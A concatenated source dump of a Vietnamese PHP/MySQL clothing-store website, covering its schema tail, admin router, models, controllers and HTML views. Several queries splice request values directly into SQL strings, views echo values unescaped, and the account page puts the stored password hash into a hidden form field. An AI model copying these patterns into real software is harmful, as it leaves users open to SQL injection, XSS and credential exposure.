ADD KEY `idQuyen` (`idQuyen`);
--
-- AUTO_INCREMENT cho các bảng đã đổ
--
--
-- AUTO_INCREMENT cho bảng `banner`
--
ALTER TABLE `banner`
MODIFY `idbanner` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;
--
-- AUTO_INCREMENT cho bảng `color`
--
ALTER TABLE `color`
MODIFY `idcolor` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;
--
-- AUTO_INCREMENT cho bảng `gopy`
--
ALTER TABLE `gopy`
MODIFY `idgopy` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=12;
--
-- AUTO_INCREMENT cho bảng `hoadon`
--
ALTER TABLE `hoadon`
MODIFY `idhoadon` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=20;
--
-- AUTO_INCREMENT cho bảng `khuyenmai`
--
ALTER TABLE `khuyenmai`
MODIFY `idKM` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=6;
--
-- AUTO_INCREMENT cho bảng `layout`
--
ALTER TABLE `layout`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT cho bảng `loaisanpham`
--
ALTER TABLE `loaisanpham`
MODIFY `idLoaiSP` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT cho bảng `phanquyen`
--
ALTER TABLE `phanquyen`
MODIFY `idQuyen` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT cho bảng `sanpham`
--
ALTER TABLE `sanpham`
MODIFY `idSP` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=73;
--
-- AUTO_INCREMENT cho bảng `size`
--
ALTER TABLE `size`
MODIFY `idsize` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=22;
--
-- AUTO_INCREMENT cho bảng `user`
--
ALTER TABLE `user`
MODIFY `idUser` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=10;
--
-- Các ràng buộc cho các bảng đã đổ
--
--
-- Các ràng buộc cho bảng `hoadon`
--
ALTER TABLE `hoadon`
ADD CONSTRAINT `hoadon_ibfk_1` FOREIGN KEY (`idUser`) REFERENCES `user` (`idUser`) ON DELETE CASCADE ON UPDATE CASCADE;
--
-- Các ràng buộc cho bảng `sanpham`
--
ALTER TABLE `sanpham`
ADD CONSTRAINT `sanpham_ibfk_1` FOREIGN KEY (`idLoaiSP`) REFERENCES `loaisanpham` (`idLoaiSP`) ON DELETE CASCADE ON UPDATE CASCADE,
ADD CONSTRAINT `sanpham_ibfk_2` FOREIGN KEY (`idsize`) REFERENCES `size` (`idsize`);
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/admin/views_admin/sanpham/them_soluong.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Thêm số lượng </div>
<div class="panel-body">
<form method="POST" action="?action=them_soluong" enctype="multipart/form-data">
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Số lượng nhập thêm</div>
<div class="col-md-10">
<input type="hidden" value="<?php echo $idSP; ?>" name="idSP" required>
<input type="hidden" value="<?php echo $soluong_sanpham; ?>" name="soluong_sanpham" required>
<input type="text" value="" name="soluong_them" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Thêm</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
</div>
</div><file_sep>/model/show_home.php
<?php
require_once('ketnoi.php');
/**
*
*/
class home
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function banner() //ok
{
$query = "SELECT * from banner";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function loaisanphamHome() //đang
{
$query = "SELECT * from loaisanpham limit 3";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function allsanpham_trangchu() //đang
{
$query = "SELECT * from sanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function sanpham_trangchu() //đang
{
$query = "SELECT * from sanpham ORDER BY soluong ASC limit 0,6";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function layout()
{
$query = "SELECT * FROM layout";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
}
?><file_sep>/admin/index.php
<?php
session_start();
$act = isset($_GET['action']) ? $_GET['action'] : "trangchu";
switch ($act) {
case 'trangchu':
require_once('controller_admin/home.php');
$controller_taikhoanobj = new trangchucontroller();
$controller_taikhoanobj->dem();
break;
case 'sualayout':
require_once('controller_admin/home.php');
$controller_taikhoanobj = new trangchucontroller();
$controller_taikhoanobj->update_layout();
break;
case 'xoalayout':
unset($_SESSION['mail']);
unset($_SESSION['phone']);
unset($_SESSION['diachi']);
require_once('controller_admin/home.php');
$controller_taikhoanobj = new trangchucontroller();
$controller_taikhoanobj->dem();
break;
case 'taikhoan': // đã hiển thị được thông tin
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->list();
break;
// case 'danhmuc':
// require_once('controller_admin/danhmucsanpham.php');
// break;
case 'xemnguoidung':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->details();
break;
case 'edit': // UPDATE giao diện
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->edit();
break;
case 'sua_xl': //UPDATE xử lý
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->update();
break;
case 'them_giaodien':
require_once('views_admin/index.php');
break;
case 'them':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->them();
break;
case 'xoanguoidung':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->xoanguoidung();
break;
case 'phanquyen':
require_once('controller_admin/quanlytaikhoan.php');
$controller_taikhoanobj = new nguoidungcontroller();
$controller_taikhoanobj->phanquyen();
break;
case 'sanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->list();
break;
case 'xemsanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'suasanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'suasanpham_xl':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->update();
break;
case 'them_sanpham_giaodien':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them_giaodien();
break;
case 'them_soluong_giaodien':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them_soluong_giaodien();
break;
case 'them_sanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them();
break;
case 'them_soluong':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->them_soluong();
break;
case 'xoasanpham':
require_once('controller_admin/quanlysanpham.php');
$controller_taikhoanobj = new sanphamcontroller();
$controller_taikhoanobj->xoasanpham();
break;
//loại sản phẩm
case 'loaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->list();
break;
case 'xemloaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'sualoaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->details();
break;
case 'sualoaisanpham_xl':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->update();
break;
case 'themloaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->them();
break;
case 'xoaloaisanpham':
require_once('controller_admin/quanlyloaisanpham.php');
$controller_taikhoanobj = new loaisanphamcontroller();
$controller_taikhoanobj->xoaloaisanpham();
break;
case 'themloaisanpham_giaodien':
require_once('views_admin/index.php');
break;
//hóa đơn
case 'hoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->list();
break;
case 'xoahoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->xoahoadon();
break;
case 'xemhoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->chitiet_hoadon();
break;
case 'duyethoadon':
require_once('controller_admin/duyethoadon.php');
$controller_taikhoanobj = new hoadoncontroller();
$controller_taikhoanobj->duyet_hoadon();
break;
//banner
case 'banner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->list();
break;
case 'suabanner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->details();
break;
case 'suabanner_xl':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->update();
break;
case 'thembanner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->them();
break;
case 'xoabanner':
require_once('controller_admin/quanlybanner.php');
$controller_taikhoanobj = new bannercontroller();
$controller_taikhoanobj->xoabanner();
break;
case 'thembanner_giaodien':
require_once('views_admin/index.php');
break;
//khuyến mãi
case 'khuyenmai':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->list();
case 'xemkhuyenmai':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->details();
break;
case 'suakhuyenmai_giaodien':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->details();
break;
case 'suakhuyenmai_xl':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->update();
break;
case 'themkhuyenmai_xl':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->them();
break;
case 'xoakhuyenmai':
require_once('controller_admin/quanlykhuyenmai.php');
$controller_taikhoanobj = new khuyenmaicontroller();
$controller_taikhoanobj->xoakhuyenmai();
break;
case 'themkhuyenmai_giaodien':
require_once('views_admin/index.php');
break;
default:
require_once('controller_admin/home.php');
break;
}
?><file_sep>/views/footer/footer.php
<!-- footer top area start -->
<div class="footer-top-area">
<div class="container">
<div class="row">
<div class="col-md-6 col-sm-4">
<div class="footer-contact">
<div style="text-align:center">
<h3 style="color:#fff">Hồng An Store</h3>
<p>Uy tín - Chất lượng - Thời thượng</p>
</div>
<ul class="address">
<li>
<span class="fa fa-fax"></span>
<?php echo $_SESSION['diachi'] ?>
</li>
<li>
<span class="fa fa-phone"></span>
<?php echo '(+84) '.$_SESSION['phone']; ?>
</li>
<li>
<span class="fa fa-envelope-o"></span>
<?php echo $_SESSION['mail'] ?>
</li>
</ul>
</div>
</div>
<div class="col-md-3 col-sm-4">
<div class="footer-support">
<div class="footer-title">
<h3>Chính sách</h3>
</div>
<div class="footer-menu">
<ul>
<li><a href="#">Điều khoản sử dụng</a></li>
<li><a href="#">Chính sách bảo mật</a></li>
<li><a href="#">Thuế-Giá trị gia tăng</a></li>
<!-- <li><a href="#">Về chúng tôi</a></li> -->
</ul>
</div>
</div>
</div>
<div class="col-md-3 col-sm-4">
<div class="footer-info">
<div class="footer-title">
<h3>Điều khoản</h3>
</div>
<div class="footer-menu">
<ul>
<li><a href="about-us.html">Về chúng tôi</a></li>
<li><a href="#">Cửa hàng</a></li>
<li><a href="#">Bản quyền</a></li>
<!-- <li><a href="#">Orders and Returns</a></li>
<li><a href="#">Site Map</a></li> -->
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- footer top area end -->
<!-- footer area start -->
<footer class="footer-area">
<div class="container">
<div class="row">
<div class="col-sm-6">
<div class="footer-copyright">
<p>Copyright © 2021 <a href="#"> <EMAIL></a>. Thanks You</p>
</div>
</div>
<div class="col-sm-6">
<div class="payment-icon">
<img src="img/payment.png" alt="">
</div>
</div>
</div>
</div>
<a href="#" id="scrollUp"><i class="fa fa fa-arrow-up"></i></a>
</footer>
<!-- footer area end -->
<file_sep>/model/hang.php
<?php
require_once('ketnoi.php');
/**
*
*/
class mathang
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function details_hang($id) //đang
{
$query = "SELECT * from sanpham WHERE idSP = '$id'";
return $this->conn->query($query)->fetch_assoc();
}
function loaisanpham() //đang
{
$query = "SELECT * from loaisanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function layten_loaisanpham($id)
{
$query = "SELECT * FROM loaisanpham WHERE idLoaiSP = '$id'";
return $this->conn->query($query)->fetch_assoc();
}
function getcolor($id)
{
$query = " SELECT * FROM color INNER JOIN sanpham ON color.idcolor = sanpham.idcolor WHERE idSP = '$id'";
return $this->conn->query($query)->fetch_assoc();
}
function getsize($id)
{
$query = "SELECT * FROM size INNER JOIN sanpham ON size.idsize = sanpham.idsize WHERE idSP='$id'";
return $this->conn->query($query)->fetch_assoc();
}
function sanpham_cuahangtheoid($idLoaiSP) //đang
{
$query = "SELECT * FROM sanpham WHERE idLoaiSP = $idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
//hiển thị sản phẩm liên quan
function sanphamlienquan($id)
{
$query = " SELECT * FROM sanpham WHERE idLoaiSP = '$id' limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
//GÓp ý
function them_gopy($idSP, $email, $noidung)
{
$query = "INSERT INTO gopy(idSP, email, noidung) VALUES ('$idSP', '$email', '$noidung')" ;
$result = $this->conn->query($query);
}
function xem_gopy()
{
$query = "SELECT * FROM gopy";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
}
?><file_sep>/views/home/home.php
<?php require_once('./views/slider/slider.php'); ?>
<!-- new products area start -->
<div class="new-product home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="product-title">
<h2>Sản Phẩm Mới</h2>
<a href="?action=cuahang1" style="margin-left:60%" id="textid">Xem tất cả >></a>
</div>
</div>
</div>
<div class="row">
<div class="features-home2-slider">
<?php foreach ($data_sanphamtrangchu as $value) { ?>
<div class="col-md-12">
<div class="single-product">
<div class="level-pro-new">
<span>new</span>
</div>
<div class="product-img">
<a href="?action=cuahang&id=<?php echo $value['idLoaiSP'] ?>" title="" class="thumb">
<img class="primary-img-1" src="admin/public_admin/image/sanpham/<?php echo $value['anh1'] ?>" alt="">
<img class="primary-img-2" src="admin/public_admin/image/sanpham/<?php echo $value['anh2'] ?>" alt="">
</a>
</div>
<div class="actions">
<a href="?action=giohang&act=add_giohang&id=<?= $value['idSP'] ?>">
<button onclick="" type="submit" class="cart-btn" title="Add to cart">Cart</button></a>
<ul class="add-to-link">
<li><a class="modal-view" href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>"> <i class="fa fa-search"></i></a></li>
<li><a href="../wishlist/index"> <i class="fa fa-heart-o"></i></a></li>
</ul>
</div>
<div class="product-price">
<div class="product-name">
<a href="" title="" class="name-product"> <?php echo $value['tenSP'] ?> </a>
</div>
<div class="price-rating">
<span><?= number_format($value['Dongia']); ?> VND</span>
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
</div>
</div>
</div>
</div>
</div>
<?php } ?>
</div>
</div>
</div>
</div>
<!-- new products area start -->
<?php foreach ($data_loaisanphamhome as $row) : ?>
<div class="new-product home2">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="product-title">
<h2><?= $row['tenLSP'] ?></h2>
</div>
</div>
</div>
<div class="row">
<div class="features-home2-slider">
<?php foreach ($data_allsanphamtrangchu as $value) :
if ($row['idLoaiSP'] == $value['idLoaiSP']) {
?>
<div class="col-md-12">
<div class="single-product">
<div class="level-pro-new">
<span>new</span>
</div>
<div class="product-img">
<a href="?action=cuahang&id=<?php echo $value['idSP'] ?>" title="" class="thumb">
<img class="primary-img-1" src="admin/public_admin/image/sanpham/<?= $value['anh1'] ?>" alt="">
<img class="primary-img-2" src="admin/public_admin/image/sanpham/<?= $value['anh2'] ?>" alt="">
</a>
</div>
<div class="actions">
<a href="?action=giohang&act=add_giohang&id=<?= $value['idSP'] ?>">
<button onclick="" type="submit" class="cart-btn" title="Add to cart">Cart</button></a>
<ul class="add-to-link">
<li><a class="modal-view" href="?action=chitietmathang&id=<?= $value['idSP'] ?>&idLoaiSP=<?= $value['idLoaiSP'] ?>"> <i class="fa fa-search"></i></a></li>
<li><a href="../wishlist/index"> <i class="fa fa-heart-o"></i></a></li>
</ul>
</div>
<div class="product-price">
<div class="product-name">
<a href="" title="" class="name-product"> <?php echo $value['tenSP'] ?> </a>
</div>
<div class="price-rating">
<span><?= number_format($value['Dongia']); ?> VND</span>
<div class="ratings">
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star"></i>
<i class="fa fa-star-half-o"></i>
</div>
</div>
</div>
</div>
</div>
<?php }
endforeach ?>
</div>
</div>
</div>
</div>
<?php endforeach ?>
<!-- <?php// require_once('./views/sanphammoinhat/sanphammoinhat.php'); ?> --><file_sep>/admin/controller_admin/quanlyloaisanpham.php
<?php
// CONTROLLER DÙNG ĐỂ GỌI CÁC HÀM TRONG MODEL
require_once('./model_admin/loaisanpham.php'); // đã gọi được rồi
/**
*
*/
class loaisanphamcontroller
{
var $loaisanpham_model;
public function __construct()
{
$this->loaisanpham_model = new loaisanpham();
}
public function list()
{
if(isset($_POST['timkiem_lsp'])){
$timkiem_lsp = $_POST['timkiem_lsp'];
$data = $this->loaisanpham_model->timkiem_lsp($timkiem_lsp);
}else{
$data = $this->loaisanpham_model->all();
}
require_once('views_admin/index.php');
}
public function details()
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->loaisanpham_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$idLoaiSP = filter_input(INPUT_POST, 'idLoaiSP');
$tenLSP = filter_input(INPUT_POST, 'tenLSP');
$this->loaisanpham_model->update($idLoaiSP, $tenLSP);
}
public function them()
{
$tenLSP = filter_input(INPUT_POST, 'tenLSP');
$this->loaisanpham_model->insert($tenLSP);
}
public function xoaloaisanpham() // đang
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$this->loaisanpham_model->delete($id);
}
}
?><file_sep>/views/taikhoannguoidung/taikhoannguoidung.php
<!-- pages-title-start -->
<div class="shopping-cart">
<div class="container">
<div class="row">
<div class="col-md-12">
<div class="location">
<ul>
<li><a href="index.html" title="go to homepage">Home<span>/</span></a> </li>
<li><strong>Login page</strong></li>
</ul>
</div>
</div>
</div>
</div>
</div>
<div class="pages-title section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12">
<div class="pages-title-text text-center">
<h2>Thông tin tài khoản</h2>
</div>
</div>
</div>
</div>
</div>
<section id="cart_items" style="margin-top: -50px; margin-bottom: -50px;">
<div class="container">
<div class="breadcrumbs">
<ol class="breadcrumb">
<li><a href="#">Home</a></li>
<li class="active">Tài khoản người dùng</li>
</ol>
</div>
</div>
</section>
<!-- pages-title-end -->
<!-- My account content section start -->
<section class="pages my-account-page section-padding">
<div class="container">
<div class="row">
<div class="col-xs-12 col-sm-12">
<div class="padding60">
<div class="log-title">
<h3><strong>Tài khoản của tôi</strong></h3>
</div>
<div class="prament-area main-input" id="doitk">
<ul class="panel-group" id="accordion">
<li class="panel">
<div class="account-title" data-toggle="collapse" data-parent="#accordion" data-target="#collapse1">
<label>
<input type="radio" checked value="forever" name="rememberme">
Thông tin cá nhân
</label>
</div>
<div id="collapse1" class="panel-collapse collapse in">
<div class="single-log-info">
<div class="bulling-title">
<div class="custom-input">
<form action="?action=suataikhoan" method="POST">
<input type="hidden" name="idUser" value="<?php echo $data_taikhoan['idUser'] ?>" required>
<div class="row">
<div class="col-md-6">
<input type="text" name="ho" placeholder="Họ.." value="<?php echo $data_taikhoan['ho'] ?>" required>
</div>
<div class="col-md-6">
<input type="text" name="ten" placeholder="Tên.." value="<?php echo $data_taikhoan['ten'] ?>" required>
</div>
</div>
<input type="text" name="email" placeholder="Email.." value="<?php echo $data_taikhoan['email'] ?>" required>
<input type="text" name="diachi" placeholder="Địa chỉ.." value="<?php echo $data_taikhoan['diachi'] ?>" required >
<div class="custom-select">
<select class="form-control" name="gioitinh" title="Giới tính" style="width:20%">
<option value="Nam" > Nam</option>
<option value="Nữ"> Nữ</option>
<option value="Khác"> Khác</option>
</select>
</div>
<input type="text" name="sodienthoai" placeholder="Số điện thoại.." pattern="[0-9]+" minlength="9" value="<?php echo $data_taikhoan['sodienthoai'] ?>" required/>
<input type="text" name="tendangnhap" placeholder="Tên đăng nhập.." value="<?php echo $data_taikhoan['tendangnhap'] ?>" required/>
<!-- <input type="text" name="matkhau" placeholder="Mật khẩu.." pattern="[0-9]+"
minlength="5" value="<?php echo $data_taikhoan['matkhau'] ?>" required/>
-->
<div class="submit-text">
<button type="submit">Lưu</button>
</div>
</form>
</div>
</div>
</div>
</li>
<!-- đổi mật khẩu -->
<li class="panel">
<div class="account-title" data-toggle="collapse" data-parent="#accordion" data-target="#collapse4">
<label>
<input type="radio" value="forever" name="rememberme" />
Đổi mật khẩu
</label>
</div>
<div id="collapse4" class="panel-collapse collapse">
<div class="single-log-info">
<div class="custom-input">
<form action="#" method="post" onsubmit="return validate()">
<input type="hidden" name="idUser" value="<?php echo $data_taikhoan['idUser'] ?>">
<?php $matkhau_md5 = $data_taikhoan['matkhau']; ?>
<input id="matkhauchinh" type="hidden" value="<?php echo $matkhau_md5; ?>">
<input id="mk_ht" type="password" placeholder="Mật khẩu hiện tại .. " name="matkhau" minlength="5">
<input id="mk" type="password" placeholder="Mật khẩu mới .. " name="matkhaumoi" />
<input id="nhaplai_mk" type="password" placeholder="Xác nhận lại mật khẩu .." name="xacnhanmatkhau" >
<div class="submit-text text-left">
<button type="submit_pw" value="submit form">Lưu</button>
</div>
</form>
</div>
</div>
</div>
</li>
<!-- end đổi mật khẩu -->
</ul>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- my account content section end -->
<script>
function validate() {
/*var mkchinh = document.getElementById("matkhauchinh").value; */
var p =document.getElementById("mk_ht").value;
var p1 = document.getElementById("mk").value;
var p2 = document.getElementById("nhaplai_mk").value;
/*
if(mkchinh != p ){
alert("Bạn đã nhập sai mật khẩu");
return false;
}
*/
if(p1 == "") {
alert("Vui lòng nhập mật khẩu!");
return false;
}
if(p2 == "") {
alert("Vui lòng xác minh mật khẩu!");
return false;
}
if(p1 != p2){
alert("Mật Khẩu Nhập Lại Không Đúng");
return false;
}
return true;
}
</script><file_sep>/controller/hoanthanhdonhang_controller.php
<?php
// require_once('views/index.php'); gọi câu mới xuất hiện giao diện được
require_once('./model/hoanthanhdonhang.php');
/**
*
*/
class hoanthanhdonhang
{
var $hoanthanhdonhang_controller;
function __construct()
{
$this->hoanthanhdonhang_controller = new hoanthanh_donhang();
}
public function list()
{
$tendangnhap = $_SESSION['tendangnhap'];
$data_user = $this->hoanthanhdonhang_controller->chitiet_donhang($tendangnhap);
$data_loaisanpham = $this->hoanthanhdonhang_controller->loaisanpham();
if(!isset($_SESSION['tendangnhap'])){
header('location: ?action=dangnhap');
}
// $idUser = isset($_GET['idUser']) ? $_GET['idUser'] : '0';
// $idSP = isset($_GET['idSP']) ? $_GET['idSP'] : '0';
// $tongtien = isset($_GET['tongtien']) ? $_GET['tongtien'] : $_GET['tongtien_KM'];
foreach ($_SESSION['sanpham'] as $key => $value) {
$idUser = isset($_GET['idUser']) ? $_GET['idUser'] : '1';
$idSP = $value['idSP'];
$tongtien = $value['Dongia'] * $value['soluong'];
$soluongmua = $value['soluong'];
$ngaymua = date("Y-m-d");
$this->hoanthanhdonhang_controller->gui_donhang_choadmin($idUser, $idSP, $tongtien, $soluongmua, $ngaymua);
}
require_once('views/index.php');
}
public function huy_session()
{
if(isset($_SESSION['sanpham'])){
unset($_SESSION['sanpham']);
unset($_SESSION['giatriKM']); // thêm để hủy sesion
unset($_SESSION['tongtien_KM']); // thêm để hủy sesion
unset($_SESSION['tongtien']); // thêm để hủy sesion
echo "<script language='javascript'>";
echo "location.href='?action=trangchu';</script>";
}
}
}
?><file_sep>/admin/controller_admin/quanlytaikhoan.php
<?php
// CONTROLLER DÙNG <NAME>I CÁC HÀM TRONG MODEL
require_once('./model_admin/nguoidung.php'); // đã gọi được rồi
/**
*
*/
class nguoidungcontroller
{
var $nguoidung_model;
public function __construct()
{
$this->nguoidung_model = new nguoidung();
}
public function list() // hàm hiển thị tất cả tài khoản người dùng trong database
{
if(isset($_POST['timkiem'])){
$timkiem = $_POST['timkiem'];
$data = $this->nguoidung_model->timkiem($timkiem);
}else{
$data = $this->nguoidung_model->all();
}
require_once('views_admin/index.php');
}
public function details() // hàm hiển thị chi tiết thông tin của một người dùng được chọn bởi $id
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->nguoidung_model->find($id);
require_once('views_admin/index.php');
}
public function edit()
{
$id = isset($_GET['id']) ? $_GET['id'] : 1;
$data = $this->nguoidung_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$ho = filter_input(INPUT_POST, 'ho');
$ten =filter_input(INPUT_POST, 'ten');
$email =filter_input(INPUT_POST, 'email');
$diachi =filter_input(INPUT_POST, 'diachi');
$gioitinh =filter_input(INPUT_POST, 'gioitinh');
$sodienthoai =filter_input(INPUT_POST, 'sodienthoai');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap');
$matkhau =filter_input(INPUT_POST, 'matkhau');
$idUser = filter_input(INPUT_POST, 'id');
$this->nguoidung_model->update($idUser, $ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $matkhau);
}
public function them()
{
$ho = filter_input(INPUT_POST, 'ho');
$ten =filter_input(INPUT_POST, 'ten');
$email =filter_input(INPUT_POST, 'email');
$diachi =filter_input(INPUT_POST, 'diachi');
$gioitinh =filter_input(INPUT_POST, 'gioitinh');
$sodienthoai =filter_input(INPUT_POST, 'sodienthoai');
$tendangnhap =filter_input(INPUT_POST, 'tendangnhap');
$matkhau =filter_input(INPUT_POST, 'matkhau');
$this->nguoidung_model->insert($ho, $ten, $email, $diachi, $gioitinh, $sodienthoai, $tendangnhap, $matkhau);
}
public function xoanguoidung()
{
$id = isset($_GET['id']) ? $_GET['id'] : '';
$this->nguoidung_model->delete($id);
}
public function phanquyen()
{
$id = isset($_GET['id']) ? $_GET['id'] : '';
$quyen = $_GET['quyen'];
$this->nguoidung_model->phanquyen($id, $quyen);
}
}
?><file_sep>/controller/thanhtoan_controller.php
<?php
// require_once('views/index.php'); gọi câu mới xuất hiện giao diện được
require_once('./model/show_thanhtoan.php');
/**
*
*/
class showthanhtoan
{
var $thanhtoan_controller;
function __construct()
{
$this->thanhtoan_controller = new thanhtoan();
}
public function list()
{
$tendangnhap = $_SESSION['tendangnhap'];
$data_user = $this->thanhtoan_controller->chitiet_donhang($tendangnhap);
$data_loaisanpham = $this->thanhtoan_controller->loaisanpham();
$Dongia = isset($_GET['a']) ? $_GET['a'] : '1';
$data_sanpham = $this->thanhtoan_controller->chitiet_sanpham($Dongia);
if(!isset($_SESSION['tendangnhap'])){
header('location: ?action=dangnhap');
}
require_once('views/index.php');
}
}
?><file_sep>/views/index.php
<?php
if (isset($data_layout)) {
foreach ($data_layout as $value) { ?>
<?php
$_SESSION['mail'] = $value['mail'];
$_SESSION['phone'] = $value['phone'];
$_SESSION['diachi'] = $value['diachi'];
?>
<?php }
} ?>
<!doctype html>
<html class="no-js" lang="">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title> Home-2 || James </title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
